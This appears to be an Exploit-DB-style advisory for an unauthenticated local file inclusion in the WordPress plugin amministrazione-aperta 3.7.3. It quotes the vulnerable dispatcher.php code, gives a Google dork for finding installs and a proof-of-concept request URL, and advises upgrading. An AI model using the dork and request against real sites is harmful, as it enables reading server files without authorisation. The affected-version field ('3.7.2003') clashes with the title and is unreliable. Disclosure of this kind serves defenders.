WordPress Plugin amministrazione-aperta 3.7.3 - Local File Read - Unauthenticated

vendor:

amministrazione-aperta

by:

Hassan Khan Yusufzai - Splint3r7

8.8

CVSS

HIGH

Local File Inclusion (LFI)

CWE

Product Name: amministrazione-aperta

Affected Version From: 3.7.2003

Affected Version To: 3.7.2003

Patch Exists: YES

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Firefox

2022

WordPress Plugin amministrazione-aperta 3.7.3 – Local File Read – Unauthenticated

The WordPress Plugin amministrazione-aperta version 3.7.3 is vulnerable to Local File Inclusion (LFI). An unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable file dispatcher.php with the parameter 'open' set to the path of the file to be included. This can allow the attacker to read sensitive files from the server.

Mitigation:

Upgrade to the latest version of the WordPress Plugin amministrazione-aperta.

Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin amministrazione-aperta 3.7.3 - Local File Read - Unauthenticated
# Google Dork: inurl:/wp-content/plugins/amministrazione-aperta/
# Date: 23-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/amministrazione-aperta/
# Version: 3.7.3
# Tested on: Firefox

# Vulnerable File: dispatcher.php

# Vulnerable Code:

```
if ( isset($_GET['open']) ) {
    include(ABSPATH . 'wp-content/plugins/'.$_GET['open']);
} else {
    echo '
        <div id="welcome-panel" class="welcome-panel"
style="padding-bottom: 20px;">
                <div class="welcome-panel-column-container">';

    include_once( ABSPATH . WPINC . '/feed.php' );
```

# Proof of Concept:

localhost/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=[LFI]